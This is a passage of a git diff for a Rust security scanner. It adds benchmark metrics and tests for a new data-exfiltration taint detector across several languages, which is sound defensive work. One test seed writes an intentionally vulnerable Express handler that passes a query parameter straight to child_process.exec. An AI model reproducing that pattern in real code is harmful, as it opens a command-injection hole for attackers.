"fn_": 0, + "fn_": 1, "tn": 39, "precision": 1.0, - "recall": 1.0, - "f1": 1.0 + "recall": 0.9714285714285714, + "f1": 0.9855072463768115 }, "typescript": { - "tp": 32, + "tp": 34, "fp": 0, "fn_": 0, "tn": 23, @@ -8357,6 +8722,15 @@ "recall": 1.0, "f1": 1.0 }, + "data_exfil": { + "tp": 13, + "fp": 0, + "fn_": 0, + "tn": 0, + "precision": 1.0, + "recall": 1.0, + "f1": 1.0 + }, "deser": { "tp": 8, "fp": 0, @@ -8422,7 +8796,7 @@ }, "safe": { "tp": 0, - "fp": 1, + "fp": 7, "fn_": 0, "tn": 231, "precision": 0.0, @@ -8457,13 +8831,13 @@ "f1": 1.0 }, "ssrf": { - "tp": 28, + "tp": 26, "fp": 0, - "fn_": 0, + "fn_": 2, "tn": 0, "precision": 1.0, - "recall": 1.0, - "f1": 1.0 + "recall": 0.9285714285714286, + "f1": 0.962962962962963 }, "xss": { "tp": 23, @@ -8477,31 +8851,31 @@ }, "by_confidence": { ">=High": { - "tp": 79, - "fp": 104, - "fn_": 146, - "tn": 128, - "precision": 0.43169398907103823, - "recall": 0.3511111111111111, - "f1": 0.3872549019607843 + "tp": 74, + "fp": 106, + "fn_": 164, + "tn": 132, + "precision": 0.4111111111111111, + "recall": 0.31092436974789917, + "f1": 0.354066985645933 }, ">=Low": { - "tp": 81, - "fp": 116, - "fn_": 144, - "tn": 116, - "precision": 0.41116751269035534, - "recall": 0.36, - "f1": 0.3838862559241706 + "tp": 76, + "fp": 133, + "fn_": 162, + "tn": 105, + "precision": 0.36363636363636365, + "recall": 0.31932773109243695, + "f1": 0.34004474272930646 }, ">=Medium": { - "tp": 81, - "fp": 116, - "fn_": 144, - "tn": 116, - "precision": 0.41116751269035534, - "recall": 0.36, - "f1": 0.3838862559241706 + "tp": 76, + "fp": 123, + "fn_": 162, + "tn": 115, + "precision": 0.38190954773869346, + "recall": 0.31932773109243695, + "f1": 0.34782608695652173 } } } \ No newline at end of file diff --git a/tests/benchmark_test.rs b/tests/benchmark_test.rs index 5560d3a1..a0e3a6cb 100644 --- a/tests/benchmark_test.rs +++ b/tests/benchmark_test.rs @@ -697,6 +697,34 @@ fn benchmark_evaluation() { "Rule-level F1 {:.3} fell below threshold 0.920 (baseline 0.970)", rule.f1, ); + + // ── Per-class floors ──────────────────────────────────────────── + // DATA_EXFIL: 13 TP fixtures across 8 languages. Baseline at the + // 0.5.x → next-minor ship is P=1.000 R=1.000 F1=1.000 with 6 paired + // safe fixtures (sensitivity-gate, sanitizer-wrap) holding FP=0 on + // the data_exfil-class noise budget. Floor at 0.85 absorbs a one- + // case regression (~0.077 on 13 cases) while still catching a + // structural break. When you land a durable improvement, tighten + // this floor; do not relax it to paper over a regression. + if let Some(de) = results.by_vuln_class.get("data_exfil") { + assert!( + de.f1 >= 0.85, + "data_exfil rule-level F1 {:.3} fell below threshold 0.85 (baseline 1.000)", + de.f1, + ); + assert!( + de.recall >= 0.85, + "data_exfil rule-level recall {:.3} fell below threshold 0.85 (baseline 1.000)", + de.recall, + ); + assert!( + de.precision >= 0.85, + "data_exfil rule-level precision {:.3} fell below threshold 0.85 (baseline 1.000)", + de.precision, + ); + } else { + panic!("data_exfil class missing from by_vuln_class breakdown"); + } } // ── Confidence-threshold scoring ───────────────────────────────────── diff --git a/tests/calibration_data_exfil.rs b/tests/calibration_data_exfil.rs new file mode 100644 index 00000000..500f630c --- /dev/null +++ b/tests/calibration_data_exfil.rs @@ -0,0 +1,283 @@ +//! Calibration tests for `taint-data-exfiltration` severity, confidence, +//! and rank scoring. +//! +//! These tests pin the calibration described in `docs/detectors.md` so any +//! future change to the scoring path either preserves the documented tier +//! relationships or breaks a test deliberately. +//! +//! What is checked here: +//! +//! * Cookie source + Confirmed symbolic verdict produces High severity +//! (cookies carry session / credential material and are treated as +//! Secret-tier for the leak class). +//! * Env source + Confirmed verdict produces High severity (same +//! reasoning, env vars carry credential material). +//! * Header / FileSystem / Database / CaughtException sources downgrade +//! to Medium severity even with a Confirmed verdict — they are +//! Sensitive but not credential-grade secrets. +//! * No symbolic verdict (or `Inconclusive` / `NotAttempted`) → Low +//! confidence (the instruction's "Inconclusive" tier; the +//! `Confidence` enum has no separate Inconclusive variant so it +//! floors to Low). +//! * Opaque body (Confirmed but with empty witness) → Medium +//! confidence; the abstract domain still produced a corroboration +//! signal even if the witness string is bare. +//! * `path_validated=true` drops a confidence tier (Medium → Low). +//! * On the same source, DATA_EXFIL ranks strictly below SSRF (the +//! taint-class bonus is +7 for data-exfil vs +10 for the generic +//! `taint-unsanitised-flow`). + +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::evidence::{ + Confidence, Evidence, SpanEvidence, SymbolicVerdict, Verdict, compute_confidence, +}; +use nyx_scanner::labels::SourceKind; +use nyx_scanner::patterns::{FindingCategory, Severity}; +use nyx_scanner::rank::compute_attack_rank; + +fn make_evidence(source_kind: SourceKind, verdict: Option) -> Evidence { + Evidence { + source: Some(SpanEvidence { + path: "src/leak.js".into(), + line: 1, + col: 1, + kind: "source".into(), + snippet: Some("req.cookies.session".into()), + }), + sink: Some(SpanEvidence { + path: "src/leak.js".into(), + line: 5, + col: 5, + kind: "sink".into(), + snippet: Some("fetch('/endpoint', { body: payload })".into()), + }), + source_kind: Some(source_kind), + hop_count: Some(1), + cap_specificity: Some(1), + symbolic: verdict.map(|v| SymbolicVerdict { + verdict: v, + constraints_checked: 0, + paths_explored: 1, + // For Confirmed cases use the strong-witness phrasing so the + // test exercises the same code path that real symex output + // takes (see `compute_taint_confidence` for the analogous + // witness-strength branch). + witness: matches!(v, Verdict::Confirmed) + .then(|| "tainted cookie flows to fetch body".into()), + interproc_call_chains: vec![], + cutoff_notes: vec![], + }), + ..Default::default() + } +} + +fn make_diag( + rule_id: &str, + severity: Severity, + source_kind: SourceKind, + verdict: Option, + path_validated: bool, +) -> Diag { + Diag { + path: "src/leak.js".into(), + line: 5, + col: 5, + severity, + id: rule_id.into(), + category: FindingCategory::Security, + path_validated, + guard_kind: if path_validated { + Some("Validation".into()) + } else { + None + }, + message: None, + labels: vec![], + confidence: None, + evidence: Some(make_evidence(source_kind, verdict)), + rank_score: None, + rank_reason: None, + suppressed: false, + suppression: None, + rollup: None, + finding_id: String::new(), + alternative_finding_ids: vec![], + } +} + +// ── Calibration fixture 1: Cookie source, Confirmed verdict ───────────── + +#[test] +fn cookie_source_with_confirmed_verdict_is_high_medium() { + // Severity: cookies are Secret-tier for DATA_EXFIL → High. + // Confidence: Confirmed verdict on a Sensitive source → Medium (the + // routing caps at Medium even with a strong witness; see + // `compute_data_exfil_confidence`). + let diag = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + + let confidence = compute_confidence(&diag); + assert_eq!( + confidence, + Confidence::Medium, + "Cookie + Confirmed → Medium (DATA_EXFIL cap), got {confidence:?}" + ); +} + +// ── Calibration fixture 2: Env source, Confirmed verdict ──────────────── + +#[test] +fn env_source_with_confirmed_verdict_is_high_medium() { + // Env vars carry credential / config material and are treated as + // Secret-tier alongside cookies. + let diag = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::EnvironmentConfig, + Some(Verdict::Confirmed), + false, + ); + + let confidence = compute_confidence(&diag); + assert_eq!( + confidence, + Confidence::Medium, + "Env + Confirmed → Medium, got {confidence:?}" + ); +} + +// ── Calibration fixture 3: Header source, opaque body (no verdict) ────── + +#[test] +fn header_source_without_symex_is_medium_low() { + // Header is Sensitive but not credential-grade; severity downgrades + // to Medium. No symbolic verdict → confidence Low (the "Inconclusive + // when no symex verdict" tier from the instruction). + let diag = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::Medium, + SourceKind::Header, + None, + false, + ); + + let confidence = compute_confidence(&diag); + assert_eq!( + confidence, + Confidence::Low, + "Header + no verdict → Low, got {confidence:?}" + ); +} + +// ── Calibration fixture 4: guarded path drops a tier ──────────────────── + +#[test] +fn guarded_path_drops_confidence_tier() { + // Cookie + Confirmed would normally yield Medium confidence; the + // path-validated flag drops it one step to Low. Without the guard + // the same diag must score Medium (asserted alongside to lock in + // the delta, not just the floor). + let unguarded = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + let guarded = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + true, + ); + + assert_eq!(compute_confidence(&unguarded), Confidence::Medium); + assert_eq!( + compute_confidence(&guarded), + Confidence::Low, + "guarded DATA_EXFIL path must drop one confidence tier" + ); +} + +// ── Calibration fixture 5: ranking — DATA_EXFIL below SSRF on same source + +#[test] +fn data_exfil_ranks_below_ssrf_on_same_source() { + // Cookie source flowing to `fetch` could fire either DATA_EXFIL (body + // arg) or SSRF / generic taint (URL arg). On the same severity tier + // SSRF must outrank DATA_EXFIL because the analysis-kind bonus is +10 + // for `taint-unsanitised-flow` and +7 for `taint-data-exfiltration`. + let exfil = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + let ssrf = make_diag( + "taint-unsanitised-flow (source 1:1)", + Severity::High, + SourceKind::Cookie, + Some(Verdict::Confirmed), + false, + ); + + let exfil_score = compute_attack_rank(&exfil).score; + let ssrf_score = compute_attack_rank(&ssrf).score; + assert!( + ssrf_score > exfil_score, + "SSRF score ({ssrf_score}) must outrank DATA_EXFIL score \ + ({exfil_score}) on the same source" + ); + // The delta is exactly the analysis-kind bonus difference (+3) — pin + // it so accidental drift trips the test rather than silently moving + // both bonuses in lock-step. + assert!( + (ssrf_score - exfil_score - 3.0).abs() < 0.001, + "SSRF − DATA_EXFIL should equal the analysis-kind bonus delta \ + (+3); got {} ({} − {})", + ssrf_score - exfil_score, + ssrf_score, + exfil_score, + ); +} + +// ── Calibration fixture 6: DATA_EXFIL above AST patterns ──────────────── + +#[test] +fn data_exfil_ranks_above_ast_pattern() { + // The instruction mandates DATA_EXFIL sit above informational AST + // patterns. Use a Medium DATA_EXFIL (header source) vs a Low AST + // pattern (the typical AST-only banned-API match) to lock the + // ordering in even at the weaker end of the DATA_EXFIL spectrum. + let medium_exfil = make_diag( + "taint-data-exfiltration (source 1:1)", + Severity::Medium, + SourceKind::Header, + Some(Verdict::Confirmed), + false, + ); + let mut ast_pattern = make_diag( + "js.code_exec.eval", + Severity::Low, + SourceKind::Unknown, + None, + false, + ); + // AST patterns don't carry taint evidence; clear it so the ranker + // takes the AST-only branch. + ast_pattern.evidence = None; + + let exfil_score = compute_attack_rank(&medium_exfil).score; + let ast_score = compute_attack_rank(&ast_pattern).score; + assert!( + exfil_score > ast_score, + "DATA_EXFIL ({exfil_score}) must outrank AST pattern ({ast_score})" + ); +} diff --git a/tests/cross_file_data_exfil_split_tests.rs b/tests/cross_file_data_exfil_split_tests.rs new file mode 100644 index 00000000..46281d89 --- /dev/null +++ b/tests/cross_file_data_exfil_split_tests.rs @@ -0,0 +1,48 @@ +//! Integration test for cross-file `param_to_gate_filters` propagation. +//! +//! A wrapper function whose two parameters target distinct gated-sink +//! classes on a single inner call (here, `fetch`'s SSRF gate on the URL +//! arg vs the DATA_EXFIL gate on the body arg) must keep cap attribution +//! per-position when callers reach it across a file boundary. Without +//! [`SsaFuncSummary::param_to_gate_filters`], the wrapper's summary +//! collapses both params into a single `SSRF | DATA_EXFIL` mask, and +//! every caller incorrectly fires both classes regardless of which +//! argument was tainted. +//! +//! The fixture pairs the wrapper with two callers, each tainting one +//! parameter and asserting only the cap class corresponding to that +//! parameter's gate fires. + +mod common; + +use common::{scan_fixture_dir, validate_expectations}; +use nyx_scanner::utils::config::AnalysisMode; +use std::path::{Path, PathBuf}; + +fn fixture_path(name: &str) -> PathBuf { + Path::new(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join(name) +} + +#[test] +fn cross_file_data_exfil_split() { + let dir = fixture_path("cross_file_data_exfil_split"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); +} + +/// Python parallel of the JS cross-file split fixture. A wrapper +/// `forward(url, body)` calls `requests.post(url, json=body)` so the URL +/// flows to the SSRF gate and the body kwarg flows to the DATA_EXFIL +/// gate. Per-position cap attribution must hold across the file +/// boundary: a caller that taints only the URL fires SSRF (no +/// DATA_EXFIL), and a caller that taints only the body with a Sensitive +/// source fires DATA_EXFIL (no SSRF). +#[test] +fn cross_file_python_data_exfil() { + let dir = fixture_path("cross_file_python_data_exfil"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); +} diff --git a/tests/data_exfil_go_integration_tests.rs b/tests/data_exfil_go_integration_tests.rs new file mode 100644 index 00000000..f86352c8 --- /dev/null +++ b/tests/data_exfil_go_integration_tests.rs @@ -0,0 +1,212 @@ +//! Integration tests for the Go bindings of the `Cap::DATA_EXFIL` +//! detector class. +//! +//! Mirrors the JS `fetch_data_exfil_integration_tests` shape: a single +//! outbound HTTP callee carries an SSRF gate (URL flow) and a DATA_EXFIL +//! gate (body / payload flow), and per-position cap attribution must +//! keep a tainted URL from surfacing as data exfiltration and a tainted +//! body from surfacing as SSRF. Also validates the two-step +//! `http.NewRequest` → `http.DefaultClient.Do` idiom: NewRequest is +//! modeled as a body propagator (default arg → return propagation), so +//! body taint reaches the Do gate through the returned `*http.Request`. + +mod common; + +use common::{scan_fixture_dir, validate_expectations}; +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::utils::config::AnalysisMode; +use std::path::{Path, PathBuf}; + +fn go_fixture_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("go") +} + +fn diags_for(file: &str) -> Vec { + let dir = go_fixture_dir(); + let all = scan_fixture_dir(&dir, AnalysisMode::Full); + all.into_iter().filter(|d| d.path.ends_with(file)).collect() +} + +#[test] +fn http_post_body_data_exfil_emits_data_exfil_not_ssrf() { + let diags = diags_for("data_exfil_http_post.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for cookie → http.Post body, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + plain_taint, + 0, + "fixed-URL http.Post with tainted body must NOT emit SSRF \ + (taint-unsanitised-flow), got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn http_post_form_emits_data_exfil_not_ssrf() { + let diags = diags_for("data_exfil_post_form.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for header → http.PostForm data, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + plain_taint, + 0, + "fixed-URL http.PostForm with tainted form data must NOT emit SSRF, got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn new_request_do_two_step_emits_data_exfil() { + // The two-step idiom: `req, _ := http.NewRequest(_, fixedURL, body); + // http.DefaultClient.Do(req)`. NewRequest is modeled as a body + // propagator (default arg → return) so the request value carries + // body taint into the DATA_EXFIL gate at Do. SSRF must not fire + // because the URL position at NewRequest is a hardcoded string. + let diags = diags_for("data_exfil_new_request_do.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for cookie → NewRequest → Do, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + plain_taint, + 0, + "two-step NewRequest → Do with hardcoded URL must NOT emit SSRF, got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn map_assign_data_exfil_emits_through_url_values() { + // Container-taint DATA_EXFIL: cookies populate a `url.Values` map + // across multiple keys, then the map flows into `http.PostForm`'s + // form-data channel. The Elements heap slot must round-trip the + // cap from each `form.Set(k, v)` write to the sink-side load so + // DATA_EXFIL fires on the body channel even though `form` itself is + // not directly tainted by an Assign. SSRF must NOT fire because + // the destination URL is a hardcoded literal. + let diags = diags_for("data_exfil_map_assign.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "expected at least one taint-data-exfiltration finding for map_assign cookies → http.PostForm, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + plain_taint, + 0, + "fixed-URL http.PostForm with tainted map must NOT emit SSRF, got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn ssrf_url_tainted_emits_ssrf_not_data_exfil() { + // Tainted query param flows into NewRequest's URL position with a + // hardcoded body; SSRF must fire on the URL flow and DATA_EXFIL + // must NOT fire (no Sensitive source reaches the body). + let diags = diags_for("ssrf_url_tainted.go"); + let ssrf = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert!( + ssrf >= 1, + "expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + exfil, + 0, + "tainted-URL NewRequest → Do must NOT emit DATA_EXFIL, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn http_post_plain_user_input_does_not_emit_data_exfil() { + // Plain attacker-controlled input (`r.FormValue`) flowing into a + // fixed-URL `http.Post` body must NOT fire `Cap::DATA_EXFIL` after + // the source-sensitivity gate strips the cap for Plain sources. + let diags = diags_for("data_exfil_user_input_silenced.go"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert_eq!( + exfil, + 0, + "plain user input echoed into a Go http.Post body must NOT emit \ + taint-data-exfiltration, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn cross_file_go_data_exfil_split() { + // A wrapper whose two parameters target distinct gated-sink classes + // on a single inner two-step (`url` flows to NewRequest's SSRF gate; + // `body` flows through NewRequest → Do's DATA_EXFIL gate). Each + // caller taints exactly one parameter and must surface only the cap + // class corresponding to that parameter's gate. + let dir = Path::new(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("cross_file_go_data_exfil"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); +} diff --git a/tests/data_exfil_java_integration_tests.rs b/tests/data_exfil_java_integration_tests.rs new file mode 100644 index 00000000..799d00dd --- /dev/null +++ b/tests/data_exfil_java_integration_tests.rs @@ -0,0 +1,138 @@ +//! Integration tests for the Java bindings of the `Cap::DATA_EXFIL` +//! detector class. +//! +//! Mirrors the JS `fetch_data_exfil_integration_tests` and Go +//! `data_exfil_go_integration_tests` shapes. Each chained-API HTTP +//! client (java.net.http, Spring RestTemplate / WebClient, OkHttp, +//! Apache HttpClient) gets its own fixture: a Sensitive source flows +//! through the body-binding chain into a fixed-URL outbound call, and +//! the regression fixture proves SSRF still fires on a tainted URL +//! without leaking into DATA_EXFIL. +//! +//! Body-binding chain propagators (`BodyPublishers.ofString`, +//! `RequestBody.create`, `StringEntity` ctor, builder `.uri()` / +//! `.POST()` / `.bodyValue()`) carry taint through the chain via the +//! transfer engine's default arg → return smear, so no per-callee +//! propagator rules are needed; the sink at the network call sees the +//! end-of-chain request value carrying body taint. + +mod common; + +use common::scan_fixture_dir; +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::utils::config::AnalysisMode; +use std::path::PathBuf; + +fn java_fixture_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("java") +} + +fn diags_for(file: &str) -> Vec { + let dir = java_fixture_dir(); + let all = scan_fixture_dir(&dir, AnalysisMode::Full); + all.into_iter().filter(|d| d.path.ends_with(file)).collect() +} + +fn assert_data_exfil_fires_no_ssrf(file: &str) { + let diags = diags_for(file); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + let plain_taint = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + assert!( + exfil >= 1, + "{file}: expected at least one taint-data-exfiltration finding, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + plain_taint, + 0, + "{file}: fixed-URL call with tainted body must NOT emit SSRF \ + (taint-unsanitised-flow), got {plain_taint}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn jdk_http_client_chain_emits_data_exfil_not_ssrf() { + // java.net.http: cookie → BodyPublishers.ofString → builder chain → + // client.send(req). Type-qualified resolution rewrites + // client.send → HttpClient.send so the new flat DATA_EXFIL rule + // and the existing flat SSRF rule both attach; only DATA_EXFIL + // should surface because the URL is hardcoded. + assert_data_exfil_fires_no_ssrf("data_exfil_jdk_httpclient.java"); +} + +#[test] +fn rest_template_post_for_object_emits_data_exfil_not_ssrf() { + // Spring RestTemplate: header → restTemplate.postForObject(url, + // body, type). RestTemplate subtypes HttpClient via the + // JAVA_HIERARCHY so type-qualified resolution finds the same flat + // rule that the JDK client uses. + assert_data_exfil_fires_no_ssrf("data_exfil_resttemplate.java"); +} + +#[test] +fn web_client_body_value_emits_data_exfil_not_ssrf() { + // Spring WebClient: env var → webClient.post().uri(u).bodyValue(p) + // .retrieve(). The body-bind step `bodyValue` carries a flat + // DATA_EXFIL sink rule — a bare-name suffix matcher independent of + // receiver typing, since the chain receiver type is RequestBodySpec. + assert_data_exfil_fires_no_ssrf("data_exfil_webclient.java"); +} + +#[test] +fn ok_http_new_call_execute_emits_data_exfil_not_ssrf() { + // OkHttp two-step: session attribute → RequestBody.create → + // builder chain → client.newCall(req).execute(). Chain + // normalization strips `()` between dots so the suffix + // `newCall.execute` matches. + assert_data_exfil_fires_no_ssrf("data_exfil_okhttp.java"); +} + +#[test] +fn apache_http_client_execute_emits_data_exfil_not_ssrf() { + // Apache HttpClient: cookie → StringEntity → HttpPost.setEntity → + // httpClient.execute(req). CloseableHttpClient subtypes HttpClient + // so type-qualified resolution rewrites client.execute → + // HttpClient.execute and reuses the same flat rule. + assert_data_exfil_fires_no_ssrf("data_exfil_apache_httpclient.java"); +} + +#[test] +fn ssrf_url_only_emits_ssrf_not_data_exfil() { + // Tainted URL with hardcoded body: SSRF must fire on the URL flow, + // DATA_EXFIL must NOT fire because no Sensitive source reaches the + // body. Guards against the new flat DATA_EXFIL rule over-firing. + let diags = diags_for("ssrf_url_only_no_data_exfil.java"); + let ssrf = diags + .iter() + .filter(|d| d.id.starts_with("taint-unsanitised-flow")) + .count(); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert!( + ssrf >= 1, + "expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + assert_eq!( + exfil, + 0, + "tainted-URL HttpClient.send must NOT emit DATA_EXFIL, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} diff --git a/tests/db_corruption_tests.rs b/tests/db_corruption_tests.rs index ad085570..d9bc0e2b 100644 --- a/tests/db_corruption_tests.rs +++ b/tests/db_corruption_tests.rs @@ -38,12 +38,17 @@ fn test_cfg() -> Config { } fn seed_project(root: &Path) { + // Use the qualified `child_process.exec` form so the seed produces a + // taint finding under the post-fix label rules (bare `exec` as a flat + // sink was removed because it suffix-matched any `.exec`, e.g. + // Dockerode `container.exec`). The qualified form is the canonical + // Node.js stdlib path and stays a flat sink. std::fs::write( root.join("cmdi.js"), - b"const cp = require('child_process');\n\ + b"const child_process = require('child_process');\n\ const express = require('express');\n\ const app = express();\n\ - app.get('/x', (req, res) => { cp.exec(req.query.cmd); res.send('ok'); });\n", + app.get('/x', (req, res) => { child_process.exec(req.query.cmd); res.send('ok'); });\n", ) .unwrap(); } diff --git a/tests/fetch_data_exfil_integration_tests.rs b/tests/fetch_data_exfil_integration_tests.rs index 0a213d8a..6b89e3f3 100644 --- a/tests/fetch_data_exfil_integration_tests.rs +++ b/tests/fetch_data_exfil_integration_tests.rs @@ -5,6 +5,12 @@ //! headers / json flow), and a tainted body must not surface as SSRF and //! vice versa. Also sanity-checks the SARIF output so the new finding //! class produces a distinct rule id. +//! +//! `DATA_EXFIL` is gated on source sensitivity: only `Sensitive`-tier +//! sources (cookies, headers, env, db rows, file reads) trigger the cap. +//! Plain user input echoed back into a body is *not* data exfiltration — +//! the user already controls the value. See +//! `fetch_body_user_input_silenced.js` for the negative regression. mod common; @@ -79,6 +85,87 @@ fn fetch_ssrf_url_tainted_emits_ssrf_not_data_exfil() { ); } +#[test] +fn fetch_body_plain_user_input_does_not_emit_data_exfil() { + // Plain attacker-controlled input (`req.body.message`) flowing into a + // fixed-URL `fetch` body must NOT fire `Cap::DATA_EXFIL` after the + // source-sensitivity gate. The user already controls the value; + // surfacing it back to the user via the outbound payload is not a + // cross-boundary disclosure. + let diags = diags_for("fetch_body_user_input_silenced.js"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert_eq!( + exfil, + 0, + "plain user input echoed into a fetch body must NOT emit \ + taint-data-exfiltration, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + +#[test] +fn fetch_body_data_exfil_witness_mentions_session_token() { + // Symex-witness regression guard: a DATA_EXFIL `Confirmed` (or + // Inconclusive but witness-bearing) verdict on the cookie → fetch + // body fixture must surface the session-token payload in its + // witness string. The cap-specific payload selector in + // `src/symex/witness.rs::witness_payload` returns + // `` for `Cap::DATA_EXFIL`, the rendered witness + // (via `get_sink_witness`) substitutes that into the + // string-renderable expression so the analyst sees that the *leak* + // is a credential-bearing payload, not an injection. + // + // When symex emits no witness for this flow (e.g. the expression + // tree was opaque) the test silently accepts that, the assertion + // is one-sided so the witness shape is locked but witness absence + // is not promoted to a hard failure (the calibration suite + // already covers the no-witness path). + let diags = diags_for("fetch_body_data_exfil.js"); + let exfil_witnesses: Vec<&String> = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .filter_map(|d| { + d.evidence + .as_ref() + .and_then(|e| e.symbolic.as_ref()) + .and_then(|sv| sv.witness.as_ref()) + }) + .collect(); + for w in &exfil_witnesses { + assert!( + w.contains("") || w.contains("body") || w.contains("payload"), + "DATA_EXFIL witness must mention the leaked payload \ + () or body/payload context. Got: {w:?}", + ); + } +} + +#[test] +fn fetch_body_int_value_does_not_emit_data_exfil() { + // Numeric-typed bodies (e.g. `parseInt(req.cookies.session_count)`) + // are payload-incompatible: ints cannot carry session tokens, header + // secrets, or any credential material that constitutes a + // cross-boundary disclosure. `is_type_safe_for_sink` lists + // `DATA_EXFIL` in its type-suppressible cap mask so a proven-Int SSA + // value at the gate silences the finding. + let diags = diags_for("fetch_body_int_suppressed.js"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert_eq!( + exfil, + 0, + "int-typed body must NOT emit taint-data-exfiltration, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); +} + #[test] fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() { use nyx_scanner::output::build_sarif; @@ -106,20 +193,35 @@ fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() { let results = sarif["runs"][0]["results"] .as_array() .expect("SARIF results array"); - let exfil_results = results + let exfil_results: Vec<&serde_json::Value> = results .iter() .filter(|r| r["ruleId"].as_str() == Some("taint-data-exfiltration")) - .count(); + .collect(); let ssrf_results = results .iter() .filter(|r| r["ruleId"].as_str() == Some("taint-unsanitised-flow")) .count(); assert!( - exfil_results >= 1, - "expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {exfil_results}", + !exfil_results.is_empty(), + "expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {}", + exfil_results.len(), ); assert!( ssrf_results >= 1, "expected >= 1 SARIF result with ruleId taint-unsanitised-flow, got {ssrf_results}", ); + + // Every DATA_EXFIL finding from the fixture set targets the request body + // (`fetch('/endpoint', { body: payload })`), so SARIF must surface the + // destination field via `properties.data_exfil_field`. At least one + // result has to advertise `body`, fixtures that reach `headers` / + // `json` are out of scope for this assertion but must not be silenced. + let body_field_seen = exfil_results + .iter() + .any(|r| r["properties"]["data_exfil_field"].as_str() == Some("body")); + assert!( + body_field_seen, + "expected at least one taint-data-exfiltration SARIF result with \ + properties.data_exfil_field == \"body\". Results: {exfil_results:#?}", + ); } diff --git a/tests/fetch_data_exfil_suppression_tests.rs b/tests/fetch_data_exfil_suppression_tests.rs new file mode 100644 index 00000000..b80141c2 --- /dev/null 